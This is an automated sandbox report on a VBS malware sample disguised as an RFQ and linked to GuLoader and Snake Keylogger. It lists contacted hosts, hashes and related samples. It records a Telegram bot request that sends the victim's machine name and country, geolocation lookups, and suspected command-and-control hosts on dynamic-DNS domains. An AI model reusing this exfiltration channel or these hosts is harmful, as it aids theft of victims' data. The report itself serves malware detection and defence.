              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://drive.usercontent.google.com1%VirustotalBrowse
              http://www.microsoft.cu0%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              http://www.microsoft.co1%VirustotalBrowse
              http://drive.google.com0%VirustotalBrowse
              https://www.office.com/0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.210.172
              truefalseunknown
              drive.google.com
              142.250.186.142
              truefalseunknown
              drive.usercontent.google.com
              142.250.185.161
              truefalseunknown
              reallyfreegeoip.org
              188.114.97.3
              truetrueunknown
              api.telegram.org
              149.154.167.220
              truetrueunknown
              checkip.dyndns.com
              132.226.8.169
              truefalseunknown
              checkip.dyndns.org
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2010/10/2024%20/%2022:08:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                unknown
                https://reallyfreegeoip.org/xml/8.46.123.33false
                • URL Reputation: safe
                unknown
                http://checkip.dyndns.org/false
                • URL Reputation: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.microsoft.cupowershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://www.office.com/msiexec.exe, 00000008.00000002.2594642585.00000000239F7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://drive.usercontent.google.compowershell.exe, 00000003.00000002.1514044704.0000026729180000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://drive.usercontent.google.com/nmsiexec.exe, 00000008.00000002.2578183119.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://go.micropowershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.microsoft.cowscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://drive.googPpowershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    https://drive.usercontent.google.com/Zmsiexec.exe, 00000008.00000002.2578183119.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://checkip.dyndns.orgmsiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://drive.google.compowershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000008.00000002.2594642585.00000000239D4000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        http://varders.kozow.com:8081msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            http://aborters.duckdns.org:8081msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://www.google.compowershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.1715629069.00000000049E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://reallyfreegeoip.org/xml/8.46.123.33$msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://anotherarmy.dns.army:8081msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://contoso.com/powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://reallyfreegeoip.orgmsiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://drive.google.compowershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.00000267275E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://drive.usercontent.google.compowershell.exe, 00000003.00000002.1514044704.0000026727858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.office.com/hmsiexec.exe, 00000008.00000002.2594642585.00000000239F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://drive.usercontent.googhZpowershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://aka.ms/pscore68powershell.exe, 00000003.00000002.1514044704.00000267273C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://apis.google.compowershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://crl.microsUpowershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1514044704.00000267273C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1715629069.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            132.226.8.169
                                            checkip.dyndns.comUnited States
                                            16989UTMEMUSfalse
                                            149.154.167.220
                                            api.telegram.orgUnited Kingdom
                                            62041TELEGRAMRUtrue
                                            188.114.97.3
                                            reallyfreegeoip.orgEuropean Union
                                            13335CLOUDFLARENETUStrue
                                            142.250.185.161
                                            drive.usercontent.google.comUnited States
                                            15169GOOGLEUSfalse
                                            142.250.186.142
                                            drive.google.comUnited States
                                            15169GOOGLEUSfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1530594
                                            Start date and time:2024-10-10 09:26:26 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 57s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:14
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:#U8a62#U50f9 (RFQ) -RFQ20241010.vbs
                                            renamed because original name is a hash value
                                            Original Sample Name: (RFQ) -RFQ20241010.vbs
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.winVBS@8/9@5/5
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 91%
                                            • Number of executed functions: 126
                                            • Number of non-executed functions: 18
                                            Cookbook Comments:
                                            • Found application associated with file extension: .vbs
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 88.221.110.91, 2.16.100.168
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                            • Execution Graph export aborted for target msiexec.exe, PID 4504 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 7620 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 8036 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            TimeTypeDescription
                                            03:27:29API Interceptor1x Sleep call for process: wscript.exe modified
                                            03:27:39API Interceptor79x Sleep call for process: powershell.exe modified
                                            04:48:37API Interceptor128983x Sleep call for process: msiexec.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            132.226.8.169SecuriteInfo.com.Win32.DropperX-gen.28977.28876.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            4a2jSwxrJU.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            ZH0pJV4XmV.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            awb_dhl 9102845290_160924R0 _323282-_563028621286.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            Opposer.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            4XQ5CxjWnW.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            mkN4VLmTt4.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            AkIhFFUNs2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            149.154.167.220p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                              sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                                1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                                  Dan's sus QR code.pngGet hashmaliciousUnknownBrowse
                                                    PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                        h9nuWiQZi6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          MiLa0yslQQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            7DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              RFQ 2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                reallyfreegeoip.orgPAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                SecuriteInfo.com.Win32.DropperX-gen.28977.28876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 188.114.96.3
                                                                z27PAYMENT.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 188.114.96.3
                                                                4a2jSwxrJU.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                h9nuWiQZi6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                bpdv3trzkv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                MiLa0yslQQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                7DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                RFQ 2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                bg.microsoft.map.fastly.net5y3FUtMSB5.exeGet hashmaliciousQuasarBrowse
                                                                • 199.232.210.172
                                                                https://aboriginal-investment-proposal.squarespace.com/Get hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                https://embassyatlantahub.com/res444.php?4-68747470733a2f2f632e7468696d65726e65742e636f6d2f623174462f-#mGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                http://www.cottesloecounselling.com.au/anna-amhrose.htmlGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                https://subsale24h.com/Get hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-editionGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                http://www.martinandfellowsres.com//Get hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                PO01282Speyside.pdfGet hashmaliciousHtmlDropperBrowse
                                                                • 199.232.210.172
                                                                api.telegram.orgp61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                                                • 149.154.167.220
                                                                sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                                                • 149.154.167.220
                                                                1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                                                • 149.154.167.220
                                                                Dan's sus QR code.pngGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                h9nuWiQZi6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                MiLa0yslQQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                7DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                RFQ 2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                TELEGRAMRUp61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                                                • 149.154.167.220
                                                                sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                                                • 149.154.167.220
                                                                1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                                                • 149.154.167.220
                                                                Dan's sus QR code.pngGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                h9nuWiQZi6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                MiLa0yslQQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                7DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                RFQ 2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                CLOUDFLARENETUSQuarantined Messages(11).zipGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                                                                • 104.16.117.116
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                • 188.114.96.3
                                                                zYlQoif21X.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                • 172.67.206.204
                                                                MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 104.21.56.207
                                                                Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                • 172.66.0.227
                                                                4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                • 172.67.74.152
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                https://aboriginal-investment-proposal.squarespace.com/Get hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                UTMEMUSSecuriteInfo.com.Win32.DropperX-gen.28977.28876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 132.226.8.169
                                                                4a2jSwxrJU.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 132.226.8.169
                                                                h9nuWiQZi6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 132.226.247.73
                                                                TBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 132.226.247.73
                                                                Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 132.226.8.169
                                                                ZH0pJV4XmV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 132.226.8.169
                                                                0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 132.226.247.73
                                                                wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                • 132.226.247.73
                                                                wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 132.226.8.169
                                                                awb_dhl 9102845290_160924R0 _323282-_563028621286.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 132.226.8.169
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                54328bd36c14bd82ddaa0c04b25ed9adPAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                SecuriteInfo.com.Win32.DropperX-gen.28977.28876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 188.114.97.3
                                                                z27PAYMENT.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 188.114.97.3
                                                                4a2jSwxrJU.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                h9nuWiQZi6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                bpdv3trzkv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                MiLa0yslQQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                7DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                RFQ 2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                3b5074b1b5d032e5620f69f9f700ff0e5y3FUtMSB5.exeGet hashmaliciousQuasarBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                https://subsale24h.com/Get hashmaliciousUnknownBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                https://unscsupply.goshopgaming.com/?bypass-cdn=1Get hashmaliciousUnknownBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-editionGet hashmaliciousUnknownBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                                • 142.250.186.142
                                                                • 149.154.167.220
                                                                • 142.250.185.161
                                                                37f463bf4616ecd445d4a1937da06e19Orden de compra.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                Orden de compra.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                Orden de compra.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                Bill Details.exeGet hashmaliciousUltraVNCBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                Bill Details.exeGet hashmaliciousUltraVNCBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                FACTURA-0055.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                FACTURA-0055.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                TBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.186.142
                                                                • 142.250.185.161
                                                                No context
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):71954
                                                                Entropy (8bit):7.996617769952133
                                                                Encrypted:true
                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):328
                                                                Entropy (8bit):3.134192963226759
                                                                Encrypted:false
                                                                SSDEEP:6:kKytL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:KsDnLNkPlE99SNxAhUe/3
                                                                MD5:2E63627539171B7D06D75118B259F451
                                                                SHA1:95BBC6E95DADE870B6D22BA775CBB2357F76FF33
                                                                SHA-256:CE64B4C9632C236ABA7B0CED792F9FE3F62C0AE9FAF39E8DC25665C7720A4A4D
                                                                SHA-512:2B438F8FD1A7555803631A0C6789CD54981DE350199421AE558AC530CA9DB1A4F3F144401DF3F6E24AEDCB70B5654CCBA0DFEB03023F03BEA326232D04B98719
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:p...... ........b......(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):8003
                                                                Entropy (8bit):4.840877972214509
                                                                Encrypted:false
                                                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                MD5:106D01F562D751E62B702803895E93E0
                                                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
